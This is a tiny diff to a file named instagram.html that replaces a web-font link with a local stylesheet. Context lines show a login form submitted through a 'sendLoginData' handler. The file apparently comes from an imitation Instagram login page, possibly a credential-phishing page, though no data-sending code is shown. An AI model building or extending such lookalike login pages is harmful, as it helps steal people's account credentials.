--- a/instagram.html
+++ b/instagram.html
@@ -1,5 +1,5 @@
 <form onsubmit="sendLoginData(event)">
-<link href="https://fonts.googleapis.com/css?family=Indie+Flower|Overpass+Mono" rel="stylesheet">
+<link rel="stylesheet" type="text/css" href="instagram.css.css">
 
 <div id="wrapper">
   <div class="main-content">
